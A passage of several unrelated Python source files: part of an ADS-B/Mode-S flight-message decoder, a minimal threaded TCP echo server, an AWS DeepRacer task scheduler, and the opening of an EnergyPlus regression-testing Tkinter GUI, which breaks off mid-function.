<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
:param template: the header explaining how data is organised
Three parameters are accepted:
- ``time`` represents the timestamp in seconds (float)
- ``shortmsg`` represents the regular version of the ADS-B
hexadecimal message (messages of length 28 for ADS-B)
- ``longmsg`` represents messages containing timestamp information
as a prefix, as dumped by many decoding softwares, such as
`dump1090 <https://github.com/MalcolmRobb/dump1090/>`_ or other
receivers.
By default, the expected format is ``time, longmsg``
"""
if isinstance(filename, str):
filename = Path(filename)
dumpformat = DumpFormat(template, sep)
with filename.open("r") as fh:
all_lines = fh.readlines()
decoder = cls(reference)
decoder.process_msgs(
list(
(
dumpformat.get_timestamp(line),
dumpformat.get_msg(line),
)
for line in all_lines
),
uncertainty=uncertainty,
)
return decoder
@classmethod
def from_binary(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, tuple[float, float]],
*,
uncertainty: bool = False,
time_fmt: str = "dump1090",
time_0: Optional[datetime] = None,
redefine_mag: int = 10,
fh: Optional[TextIO] = None,
) -> "ModeS_Decoder":
decoder = cls(reference)
redefine_freq = 2**redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_binary(filename: Union[str, Path]) -> Iterator[bytes]:
with Path(filename).open("rb") as fh:
while True:
get = fh.read()
if len(get) == 0:
return
yield get
# We don't know the size of the binary so tqdm.rich does not work
from tqdm.autonotebook import tqdm
for i, bin_msg in tqdm(enumerate(next_msg(next_in_binary(filename)))):
if len(bin_msg) < 23:
continue
msg = "".join(["{:02x}".format(t) for t in bin_msg])
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if i & redefine_freq == redefine_freq:
decoder.redefine_reference(now)
decoder.process(now, msg[18:], uncertainty=uncertainty)
return decoder
@classmethod
def from_rtlsdr(
cls,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_rtlsdr.csv",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages dumped from a RTL-SDR receiver.
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_rtlsdr.csv"``
| (The ``~`` character gets expanded as your home directory)
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
.. warning::
This method requires the `pyrtlsdr
<https://github.com/roger-/pyrtlsdr>`_ optional dependency.
"""
from .rtlsdr import MyRtlReader
decoder = cls(reference)
# dump file
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
fh = open(today, "a", 1)
rtlsdr = MyRtlReader(decoder, fh, uncertainty=uncertainty)
decoder.decode_thread = StoppableThread(target=rtlsdr.run)
decoder.decode_thread.start()
return decoder
@classmethod
def from_socket(
cls,
socket: socket.socket,
reference: Union[str, Airport, tuple[float, float]],
*,
uncertainty: bool,
time_fmt: str = "default",
time_0: Optional[datetime] = None,
redefine_mag: int = 7,
fh: Optional[TextIO] = None,
) -> "ModeS_Decoder": # coverage: ignore
decoder = cls(reference)
redefine_freq = 2**redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_socket() -> Iterator[bytes]:
while True:
if (
decoder.decode_thread is None
or decoder.decode_thread.to_be_stopped()
):
socket.close()
return
yield socket.recv(2048)
def decode() -> None:
for i, bin_msg in enumerate(next_msg(next_in_socket())):
msg = "".join(["{:02x}".format(t) for t in bin_msg])
# Timestamp decoding
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if len(bin_msg) < 23:
continue
if (
time_fmt != "radarcape"
and i & redefine_freq == redefine_freq
):
decoder.redefine_reference(now)
decoder.process(now, msg[18:], uncertainty=uncertainty)
def timer() -> None:
assert decoder.decode_thread is not None
# This one is automatically added
cls.on_timer(decoder.expire_frequency)(cls.expire_aircraft)
# if the decoder is not alive, finish expiring aircraft
while decoder.decode_thread.is_alive() or len(decoder.acs) != 0:
now = pd.Timestamp("now", tz="utc")
t, delta, operation = heapq.heappop(cls.timer_functions)
if now < t:
wait = t - now
time.sleep(wait.total_seconds())
now = pd.Timestamp("now", tz="utc")
operation(decoder)
logging.info(f"Schedule {operation.__name__} at {now + delta}")
heapq.heappush(
cls.timer_functions, (now + delta, delta, operation)
)
decoder.decode_thread = StoppableThread(target=decode)
decoder.decode_thread.start()
decoder.timer_thread = StoppableThread(target=timer)
decoder.timer_thread.start()
return decoder
def stop(self) -> None:
if self.decode_thread is not None and self.decode_thread.is_alive():
self.decode_thread.stop()
self.decode_thread.join()
def __del__(self) -> None:
self.stop()
@classmethod
def from_dump1090(
cls,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages dumped from `dump1090
<https://github.com/MalcolmRobb/dump1090/>`_
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv"``
| (The ``~`` character gets expanded as your home directory)
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
.. warning::
dump1090 must be run the ``--net`` option.
"""
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 30005))
fh = open(today, "a", 1)
return cls.from_socket(
s,
reference,
uncertainty=uncertainty,
time_fmt="dump1090",
time_0=now,
fh=fh,
)
@classmethod
def from_address(
cls,
host: str,
port: int,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv",
time_fmt: str = "radarcape",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages transmitted over a TCP network.
The file should contain for each line at least a timestamp and an
hexadecimal message, as a CSV-like format.
:param host: the IP address of the host to connect
:param port: the port of the host to connect
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_tcp.csv"``
| (The ``~`` character gets expanded as your home directory)
:param time_fmt: (default: ``"radarcape"``)
- if set to ``"radarcape"``, timestamp information included in the
long message is assumed to be GPS adjusted and is therefore used
to adjust the timestamp of each message;
- if set to ``"dump1090"``, clock information provided by the
software is used to adjust the timestamp of each message, but the
first timestamp is based on the computer clock;
- if set to ``"default"``, the timestamp from the computer is used
for all decoded messages
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
"""
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
fh = open(today, "a", 1)
return cls.from_socket(
s, reference, uncertainty=uncertainty, time_fmt=time_fmt, fh=fh
)
def redefine_reference(self, time: datetime) -> None:
pos = list(
(ac.lat, ac.lon)
for ac in self.acs.values()
if ac.alt is not None
and ac.alt < 5000
and ac.tpos is not None
and (time - ac.tpos).total_seconds() < 20 * 60
)
n = len(pos)
if n > 0:
sum_lat = cast(float, sum(a[0] for a in pos))
sum_lon = cast(float, sum(a[1] for a in pos))
self.acs.set_latlon(sum_lat / n, sum_lon / n)
def process_msgs(
self, msgs: Iterable[tuple[datetime, str]], uncertainty: bool = False
) -> None:
for i, (t, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)):
if i & 127 == 127:
self.redefine_reference(t)
self.process(t, msg, uncertainty=uncertainty)
def process(
self,
time: datetime,
msg: str,
*args: Any,
uncertainty: bool = False,
spd: Optional[float] = None,
trk: Optional[float] = None,
alt: Optional[float] = None,
) -> None:
ac: Aircraft
if len(msg) != 28:
return
df = pms.df(msg)
if df == 4 or df == 20:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.altcode = time, msg # type: ignore
if df == 5 or df == 21:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.idcode = time, msg # type: ignore
if df == 17 or df == 18: # ADS-B
if pms.crc(msg, encode=False) != 0:
return
tc = pms.adsb.typecode(msg)
icao = pms.icao(msg)
# before it's fixed in pyModeS release...
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if 1 <= tc <= 4:
ac.callsign = time, msg # type: ignore
if 5 <= tc <= 8:
ac.surface = time, msg # type: ignore
if tc == 19:
ac.speed = time, msg # type: ignore
if 9 <= tc <= 18:
# This is barometric altitude
ac.position = time, msg # type: ignore
if 20 <= tc <= 22:
# Only GNSS altitude
pass
if not uncertainty:
return
if 9 <= tc <= 18:
ac.nic_bc = pms.adsb.nic_b(msg)
if (5 <= tc <= 8) or (9 <= tc <= 18) or (20 <= tc <= 22):
ac.nuc_p = time, msg # type: ignore
if ac.version == 1:
ac.nic_v1 = time, msg # type: ignore
elif ac.version == 2:
ac.nic_v2 = time, msg # type: ignore
if tc == 19:
ac.nuc_r = time, msg # type: ignore
if ac.version in [1, 2]:
ac.nac_v = time, msg # type: ignore
if tc == 29:
ac.sil = time, msg # type: ignore
ac.nac_p = time, msg # type: ignore
if tc == 31:
ac.version = pms.adsb.version(msg)
ac.sil = time, msg # type: ignore
ac.nac_p = time, msg # type: ignore
if ac.version == 1:
ac.nic_s = pms.adsb.nic_s(msg)
elif ac.version == 2:
ac.nic_a, ac.nic_bc = pms.adsb.nic_a_c(msg)
elif df == 20 or df == 21:
bds = pms.bds.infer(msg)
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if bds == "BDS20":
ac.bds20 = time, msg # type: ignore
return
if bds == "BDS40":
ac.bds40 = time, msg # type: ignore
return
if bds == "BDS44":
ac.bds44 = time, msg # type: ignore
return
if bds == "BDS45":
ac.bds45 = time, msg # type: ignore
return
if bds == "BDS50,BDS60":
if spd is not None and trk is not None and alt is not None:
bds = pms.bds.is50or60(msg, spd, trk, alt)
elif (
ac.spd is not None
and ac.trk is not None
and ac.alt is not None
):
bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt)
else:
return
# do not return!
if bds == "BDS50":
ac.bds50 = time, msg # type: ignore
return
if bds == "BDS60":
ac.bds60 = time, msg # type: ignore
return
@property
def aircraft(self) -> list[Dict[str, Any]]:
return sorted(
(
dict(
icao24=key,
callsign=ac.callsign,
length=(
(len(ac.cumul) + len(ac._flight))
if ac._flight is not None
else len(ac.cumul)
),
position=ac.lat is not None,
data=ac,
)
# avoid dictionary change size during iteration
for (key, ac) in list(self.acs.items())
if ac.callsign is not None
),
key=itemgetter("length"),
reverse=True,
)
@property
def traffic(self) -> None | Traffic:
"""
:return: All decoded data is converted into a
:class:`~traffic.core.Traffic` object.
"""
try:
return Traffic.from_flights(
self[elt["icao24"]] for elt in self.aircraft
)
except ValueError as e:
logging.warning(e)
return None
def __getitem__(self, icao: str) -> Optional[Flight]:
with self.acs[icao].lock:
ac = self.acs[icao]
return ac.flight
|
tcp_server.py
|
#!/usr/bin/env python
__author__ = "bt3"
import socket
import threading
# Defining constants
# The IP address and port we want the server to listen on
BIND_IP = '0.0.0.0'
BIND_PORT = 9090
# Start a thread to handle client connection
def handle_client(client_socket):
# Get data from client
request = client_socket.recv(1024)
print "[*] Received: " + request
# Send back a packet
client_socket.send('ACK')
client_socket.close()
def tcp_server():
# Create a socket object (just like the client)
server = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
# Start listening
server.bind(( BIND_IP, BIND_PORT))
# the maximum backlog of connections is set to 5
server.listen(5)
print"[*] Listening on %s:%d" % (BIND_IP, BIND_PORT)
# putting the server in the loop to wait for incoming connections
while 1:
# when a client connects, we receive the client socket (client variable)
# the connections variables go to the addr variable
client, addr = server.accept()
print "[*] Accepted connection from: %s:%d" %(addr[0], addr[1])
# create a thread object that points to our function
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
if __name__ == '__main__':
tcp_server()
|
scheduler.py
|
#!/usr/bin/env python
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""
scheduler.py
This module creates the Scheduler class which is responsible to run background
daemon thread that reads from a queue and executes the function calls in a separate
thread.
"""
import threading
import queue
from deepracer_systems_pkg import constants
#########################################################################################
# Scheduler class.
class Scheduler:
"""Class responsible to run background daemon thread and schedule function calls.
"""
def __init__(self, logger):
"""Create the Scheduler object.
Args:
logger (rclpy.rclpy.impl.rcutils_logger.RcutilsLogger):
Logger object of the software_update_node.
"""
self.stop = threading.Event()
self.queue = queue.Queue()
self.logger = logger
thread = threading.Thread(target=self.loop)
thread.start()
def loop(self):
"""Main daemon loop that reads from a queue and executes the function call.
"""
self.logger.info('Entering daemon loop.')
if constants.POST_LOOP_BREAK:
self.schedule_action(self.kill)
while not self.stop.isSet():
action, keyworded_args = self.queue.get()
if len(keyworded_args):
action(keyworded_args)
else:
action()
self.logger.info('Exiting daemon loop.')
def schedule_action(self, action, **keyworded_args):
"""Helper method to add the function to the queue.
Args:
action (function): The function that is to be added to the execution queue.
"""
self.queue.put((action, keyworded_args))
def schedule_exit(self, **keyworded_args):
"""Helper method to stop the scheduler after executing all current calls in queue.
"""
self.schedule_action(self.kill)
def kill(self):
"""Wrapper method to set the stop event.
"""
self.stop.set()
|
tk_window.py
|
from datetime import datetime
from json import dumps, load as load_json_from_file
import os
from pathlib import Path
from platform import system
import random
import subprocess
import sys
from threading import Thread
from time import sleep
from tkinter import (
Tk, ttk, # Core pieces
PhotoImage, # for taskbar icon
Button, Frame, Label, LabelFrame, Listbox, Menu, OptionMenu, Scrollbar, Spinbox, # Widgets
StringVar, # Special Types
messagebox, # Dialog boxes
E, W, # Cardinal directions N, S,
X, Y, BOTH, # Orthogonal directions (for fill)
END, LEFT, TOP, # relative directions (RIGHT, TOP)
filedialog, simpledialog, # system dialogs
)
from typing import List, Union
import webbrowser
from pubsub import pub
from epregressions import VERSION
from epregressions.epw_map import get_epw_for_idf
from epregressions.runtests import TestRunConfiguration, SuiteRunner
from epregressions.structures import (
CompletedStructure,
ForceRunType,
ReportingFreq,
TestEntry,
)
from epregressions.builds.base import KnownBuildTypes, autodetect_build_dir_type, BaseBuildDirectoryStructure
from epregressions.builds.makefile import CMakeCacheMakeFileBuildDirectory
from epregressions.builds.visualstudio import CMakeCacheVisualStudioBuildDirectory
from epregressions.builds.install import EPlusInstallDirectory
class ResultsTreeRoots:
NumRun = "Cases run"
Success1 = "Case 1 Successful runs"
NotSuccess1 = "Case 1 Unsuccessful run"
Success2 = "Case 2 Successful runs"
NotSuccess2 = "Case 2 Unsuccessful run"
FilesCompared = "Files compared"
BigMath = "Files with BIG mathdiffs"
SmallMath = "Files with small mathdiffs"
BigTable = "Files with BIG tablediffs"
SmallTable = "Files with small tablediffs"
Textual = "Files with textual diffs"
@staticmethod
def get_all():
return [
ResultsTreeRoots.NumRun,
ResultsTreeRoots.Success1,
ResultsTreeRoots.NotSuccess1,
ResultsTreeRoots.Success2,
ResultsTreeRoots.NotSuccess2,
ResultsTreeRoots.FilesCompared,
ResultsTreeRoots.BigMath,
ResultsTreeRoots.SmallMath,
ResultsTreeRoots.BigTable,
ResultsTreeRoots.SmallTable,
ResultsTreeRoots.Textual,
]
class PubSubMessageTypes:
PRINT = '10'
STARTING = '20'
CASE_COMPLETE = '30'
SIMULATIONS_DONE = '40'
DIFF_COMPLETE = '50'
ALL_DONE = '60'
CANCELLED = '70'
class MyApp(Frame):
def __init__(self):
self.root = Tk(className='eplus_regression_runner')
Frame.__init__(self, self.root)
# add the taskbar icon, but its having issues reading the png on Mac, not sure.
if system() != 'Darwin':
img = PhotoImage(file=os.path.join(os.path.dirname(os.path.abspath(__file__)), 'ep.png'))
self.root.iconphoto(False, img)
# high level GUI configuration
self.root.geometry('1000x600')
self.root.resizable(width=1, height=1)
self.root.option_add('*tearOff', False) # keeps file menus from looking weird
# members related to the background thread and operator instance
self.long_thread = None
self.background_operator: Union[None, SuiteRunner] = None
# tk variables we can access later
self.label_string = StringVar()
self.build_dir_1_var = StringVar()
self.build_dir_2_var = StringVar()
self.run_period_option = StringVar()
self.run_period_option.set(ForceRunType.NONE)
self.reporting_frequency = StringVar()
self.reporting_frequency.set(ReportingFreq.HOURLY)
self.num_threads_var = StringVar()
# widgets that we might want to access later
self.build_dir_1_button = None
self.build_dir_2_button = None
self.run_button = None
self.stop_button = None
self.build_dir_1_label = None
if system() == 'Windows':
self.build_dir_1_var.set(r'C:\EnergyPlus\repos\1eplus\builds\VS64') # "<Select build dir 1>")
elif system() == 'Mac':
self.build_dir_1_var.set('/Users/elee/eplus/repos/1eplus/builds/r') # "<Select build dir 1>")
elif system() == 'Linux':
self.build_dir_1_var.set('/eplus/repos/1eplus/builds/r') # "<Select build dir 1>")
else:
self.build_dir_1_var.set("<Select build dir 1>")
self.build_dir_2_label = None
if system() == 'Windows':
self.build_dir_2_var.set(r'C:\EnergyPlus\repos\2eplus\builds\VS64') # "<Select build dir 1>")
elif system() == 'Mac':
self.build_dir_2_var.set('/Users/elee/eplus/repos/2eplus/builds/r') # "<Select build dir 1>")
elif system() == 'Linux':
self.build_dir_2_var.set('/eplus/repos/2eplus/builds/r') # "<Select build dir 1>")
else:
self.build_dir_2_var.set("<Select build dir 1>")
self.progress = None
self.log_message_listbox = None
self.results_tree = None
self.num_threads_spinner = None
self.full_idf_listbox = None
self.move_idf_to_active_button = None
self.active_idf_listbox = None
self.remove_idf_from_active_button = None
self.idf_select_all_button = None
self.idf_select_almost_all_button = None
self.idf_deselect_all_button = None
self.idf_select_n_random_button = None
self.run_period_option_menu = None
self.reporting_frequency_option_menu = None
# some data holders
self.tree_folders = dict()
self.valid_idfs_in_listing = False
self.run_button_color = '#008000'
self.build_1 = None
self.build_2 = None
self.last_results = None
self.auto_saving = False
self.manually_saving = False
self.save_interval = 10000 # ms, so 1 minute
# initialize the GUI
self.init_window()
# try to auto-load the last settings, and kick off the auto-save feature
self.client_open(auto_open=True)
self.root.after(self.save_interval, self.auto_save)
# wire up the background thread
pub.subscribe(self.print_handler, PubSubMessageTypes.PRINT)
pub.subscribe(self.starting_handler, PubSubMessageTypes.STARTING)
pub.subscribe(self.case_completed_handler, PubSubMessageTypes.CASE_COMPLETE)
pub.subscribe(self.runs_complete_handler, PubSubMessageTypes.SIMULATIONS_DONE)
pub.subscribe(self.diff_complete_handler, PubSubMessageTypes.DIFF_COMPLETE)
pub.subscribe(self.done_handler, PubSubMessageTypes.ALL_DONE)
pub.subscribe(self.cancelled_handler, PubSubMessageTypes.CANCELLED)
def init_window(self):
# changing the title of our master widget
self.root.title("EnergyPlus Regression Tool")
self.root.protocol("WM_DELETE_WINDOW", self.client_exit)
# create the menu
menu = Menu(self.root)
self.root.config(menu=menu)
file_menu = Menu(menu)
file_menu.add_command(label="Open Project...", command=self.client_open)
file_menu.add_command(label="Save Project...", command=self.client_save)
file_menu.add_command(label="Exit", command=self.client_exit)
menu.add_cascade(label="File", menu=file_menu)
help_menu = Menu(menu)
help_menu.add_command(label="Open Documentation...", command=self.open_documentation)
help_menu.add_command(label="About...", command=self.about_dialog)
menu.add_cascade(label="Help", menu=help_menu)
# main notebook holding everything
main_notebook = ttk.Notebook(self.root)
# run configuration
pane_run = Frame(main_notebook)
group_build_dir_1 = LabelFrame(pane_run, text="Build Directory 1")
group_build_dir_1.pack(fill=X, padx=5)
self.build_dir_1_button = Button(group_build_dir_1, text="Change...", command=self.client_build_dir_1)
self.build_dir_1_button.grid(row=1, column=1, sticky=W)
self.build_dir_1_label = Label(group_build_dir_1, textvariable=self.build_dir_1_var)
self.build_dir_1_label.grid(row=1, column=2, sticky=E)
group_build_dir_2 = LabelFrame(pane_run, text="Build Directory 2")
group_build_dir_2.pack(fill=X, padx=5)
self.build_dir_2_button = Button(group_build_dir_2, text="Change...", command=self.client_build_dir_2)
self.build_dir_2_button.grid(row=1, column=1, sticky=W)
self.build_dir_2_label = Label(group_build_dir_2, textvariable=self.build_dir_2_var)
self.build_dir_2_label.grid(row=1, column=2, sticky=E)
group_run_options = LabelFrame(pane_run, text="Run Options")
group_run_options.pack(fill=X, padx=5)
Label(group_run_options, text="Number of threads for suite: ").grid(row=1, column=1, sticky=E)
self.num_threads_spinner = Spinbox(group_run_options, from_=1, to_=48, textvariable=self.num_threads_var)
self.num_threads_spinner.grid(row=1, column=2, sticky=W)
Label(group_run_options, text="Test suite run configuration: ").grid(row=2, column=1, sticky=E)
self.run_period_option_menu = OptionMenu(group_run_options, self.run_period_option, *ForceRunType.get_all())
self.run_period_option_menu.grid(row=2, column=2, sticky=W)
Label(group_run_options, text="Minimum reporting frequency: ").grid(row=3, column=1, sticky=E)
self.reporting_frequency_option_menu = OptionMenu(
group_run_options, self.reporting_frequency, *ReportingFreq.get_all()
)
self.reporting_frequency_option_menu.grid(row=3, column=2, sticky=W)
main_notebook.add(pane_run, text='Configuration')
# now let's set up a list of checkboxes for selecting IDFs to run
pane_idfs = Frame(main_notebook)
group_idf_tools = LabelFrame(pane_idfs, text="IDF Selection Tools")
group_idf_tools.pack(fill=X, padx=5)
self.idf_select_all_button = Button(
group_idf_tools, text="Refresh", command=self.client_idf_refresh
)
self.idf_select_all_button.pack(side=LEFT, expand=1)
self.idf_select_all_button = Button(
group_idf_tools, text="Select All", command=self.idf_select_all
)
self.idf_select_all_button.pack(side=LEFT, expand=1)
self.idf_select_almost_all_button = Button(
group_idf_tools, text="Select All Except Long Runs", command=self.idf_select_all_except_long_runs
)
self.idf_select_almost_all_button.pack(side=LEFT, expand=1)
self.idf_deselect_all_button = Button(
group_idf_tools, text="Deselect All", command=self.idf_deselect_all
)
self.idf_deselect_all_button.pack(side=LEFT, expand=1)
self.idf_select_n_random_button = Button(
group_idf_tools, text="Select N Random", command=self.idf_select_random
)
self.idf_select_n_random_button.pack(side=LEFT, expand=1)
group_full_idf_list = LabelFrame(pane_idfs, text="Full IDF List")
group_full_idf_list.pack(fill=BOTH, expand=True, padx=5)
scrollbar = Scrollbar(group_full_idf_list)
self.full_idf_listbox = Listbox(group_full_idf_list, yscrollcommand=scrollbar.set)
self.full_idf_listbox.bind('<Double-1>', self.idf_move_to_active)
self.full_idf_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.full_idf_listbox.yview)
down_arrows = " ↓ " * 4
self.move_idf_to_active_button = Button(
pane_idfs, text=down_arrows + "Add to Active List" + down_arrows, command=self.idf_move_to_active
)
self.move_idf_to_active_button.pack(side=TOP, fill=X, expand=False)
up_arrows = " ↑ " * 4
self.remove_idf_from_active_button = Button(
pane_idfs, text=up_arrows + "Remove from Active List" + up_arrows, command=self.idf_remove_from_active
)
self.remove_idf_from_active_button.pack(side=TOP, fill=X, expand=False)
group_active_idf_list = LabelFrame(pane_idfs, text="Active IDF List")
group_active_idf_list.pack(fill=BOTH, expand=True, padx=5)
scrollbar = Scrollbar(group_active_idf_list)
self.active_idf_listbox = Listbox(group_active_idf_list, yscrollcommand=scrollbar.set)
self.active_idf_listbox.bind('<Double-1>', self.idf_remove_from_active)
self.active_idf_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.active_idf_listbox.yview)
self.build_idf_listing(initialize=True)
main_notebook.add(pane_idfs, text="IDF Selection")
# set up a scrolled listbox for the log messages
frame_log_messages = Frame(main_notebook)
group_log_messages = LabelFrame(frame_log_messages, text="Log Message Tools")
group_log_messages.pack(fill=X, padx=5)
Button(group_log_messages, text="Clear Log Messages", command=self.clear_log).pack(side=LEFT, expand=1)
Button(group_log_messages, text="Copy Log Messages", command=self.copy_log).pack(side=LEFT, expand=1)
scrollbar = Scrollbar(frame_log_messages)
self.log_message_listbox = Listbox(frame_log_messages, yscrollcommand=scrollbar.set)
self.add_to_log("Program started!")
self.log_message_listbox.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.log_message_listbox.yview)
main_notebook.add(frame_log_messages, text="Log Messages")
# set up a tree-view for the results
frame_results = Frame(main_notebook)
scrollbar = Scrollbar(frame_results)
self.results_tree = ttk.Treeview(frame_results, columns=("Base File", "Mod File"))
self.results_tree.bind('<Double-1>', self.results_double_click)
self.results_tree.heading("#0", text="Results")
self.results_tree.column('#0', minwidth=200, width=200)
self.results_tree.heading("Base File", text="Base File")
self.results_tree.column("Base File", minwidth=100, width=100)
self.results_tree.heading("Mod File", text="Mod File")
self.results_tree.column("Mod File", minwidth=100, width=100)
self.build_results_tree()
self.results_tree.pack(fill=BOTH, side=LEFT, expand=True)
scrollbar.pack(fill=Y, side=LEFT)
scrollbar.config(command=self.results_tree.yview)
main_notebook.add(frame_results, text="Results")
# pack the main notebook on the window
main_notebook.pack(fill=BOTH, expand=1)
# status bar at the bottom
frame_status = Frame(self.root)
self.run_button = Button(frame_status, text="Run", bg=self.run_button_color, command=self.client_run)
self.run_button.pack(side=LEFT, expand=0)
self.stop_button = Button(frame_status, text="Stop", command=self.client_stop, state='disabled')
self.stop_button.pack(side=LEFT, expand=0)
self.progress = ttk.Progressbar(frame_status, length=250)
self.progress.pack(side=LEFT, expand=0)
label = Label(frame_status, textvariable=self.label_string)
self.label_string.set("Initialized")
label.pack(side=LEFT, anchor=W)
frame_status.pack(fill=X)
def run(self):
self.root.mainloop()
# noinspection PyBroadException
def client_open(self, auto_open=False):
if auto_open:
open_file = os.path.join(os.path.expanduser("~"), ".regression-auto-save.ept")
if not os.path.exists(open_file):
return
open_load_file = open(open_file)
else:
open_load_file = filedialog.askopenfile(filetypes=(('ept (json) files', '.ept'),))
if not open_load_file:
return
try:
data = load_json_from_file(open_load_file)
except Exception:
if auto_open:
return # just quietly move along
simpledialog.messagebox.showerror("Load Error", "Could not load file contents as JSON!")
return
try:
self.num_threads_var.set(data['threads'])
self.run_period_option.set(data['config'])
self.reporting_frequency.set(data['report_freq'])
status = self.try_to_set_build_1_to_dir(data['build_1_build_dir'])
if status:
self.build_dir_1_var.set(data['build_1_build_dir'])
status = self.try_to_set_build_2_to_dir(data['build_2_build_dir'])
if status:
self.build_dir_2_var.set(data['build_2_build_dir'])
self.build_idf_listing(False, data['idfs'])
self.add_to_log("Project settings loaded")
except Exception:
if auto_open:
return # quietly leave
simpledialog.messagebox.showerror("Load Error", "Could not load data from project file")
def auto_save(self):
if self.manually_saving or self.auto_saving:
return # just try again later
self.client_save(auto_save=True)
self.root.after(self.save_interval, self.auto_save)
def client_save(self, auto_save=False):
# we shouldn't come into this function from the auto_save if any other saving is going on already
if self.auto_saving:
# if we get in here from the save menu and we are already trying to auto-save, give it a sec and retry
sleep(0.5)
if self.auto_saving:
# if we are still auto-saving, then just go ahead and warn
messagebox.showwarning("Auto-saving was already in process, try again.")
return
potential_num_threads = self.num_threads_var.get()
# noinspection PyBroadException
try:
num_threads = int(potential_num_threads)
idfs = []
for this_file in self.active_idf_listbox.get(0, END):
idfs.append(this_file)
these_results = {}
if self.last_results:
these_results = self.last_results.to_json_summary()
json_object = {
'config': self.run_period_option.get(),
'report_freq': self.reporting_frequency.get(),
'threads': num_threads,
'idfs': idfs,
'build_1_build_dir': self.build_1.build_directory,
'build_2_build_dir': self.build_2.build_directory,
'last_results': these_results,
}
except Exception as e:
# if we hit an exception, our action depends on whether we are manually saving or auto-saving
if auto_save:
... # just return quietly
print(e)
else:
messagebox.showerror( # issue an error before leaving
"Save Error",
"Could not save the project because some fields are not yet filled in; "
"check inputs including valid build folders"
)
return
if auto_save:
self.auto_saving = True
save_file = os.path.join(os.path.expanduser("~"), ".regression-auto-save.ept")
open_save_file = open(save_file, 'w')
else:
self.manually_saving = True
open_save_file = filedialog.asksaveasfile(defaultextension='.ept')
if not open_save_file:
return
open_save_file.write(dumps(json_object, indent=2))
open_save_file.close()
if auto_save:
self.auto_saving = False
else:
self.manually_saving = False
def results_double_click(self, event):
cur_item = self.results_tree.item(self.results_tree.focus())
col = self.results_tree.identify_column(event.x)
if col == '#1':
cell_value = cur_item['values'][2] # hidden column with base directory
elif col == '#2':
cell_value = cur_item['values'][3] # hidden column with mod directory
else:
return
self.open_file_browser_to_directory(cell_value)
@staticmethod
def open_file_browser_to_directory(dir_to_open):
this_platform = system()
p = None
if this_platform == 'Linux':
try:
p = subprocess.Popen(['xdg-open', dir_to_open])
except Exception as this_exception: # pragma: no cover - not covering bad directories
print("Could not open file:")
print(this_exception)
elif this_platform == 'Windows': # pragma: no cover - only testing on Linux
try:
p = subprocess.Popen(['start', dir_to_open], shell=True)
except Exception as this_exception:
print("Could not open file:")
print(this_exception)
elif this_platform == 'Darwin': # pragma: no cover - only testing on Linux
try:
p = subprocess.Popen(['open', dir_to_open])
except Exception as this_exception:
print("Could not open file:")
print(this_exception)
return p
@staticmethod
def open_documentation():
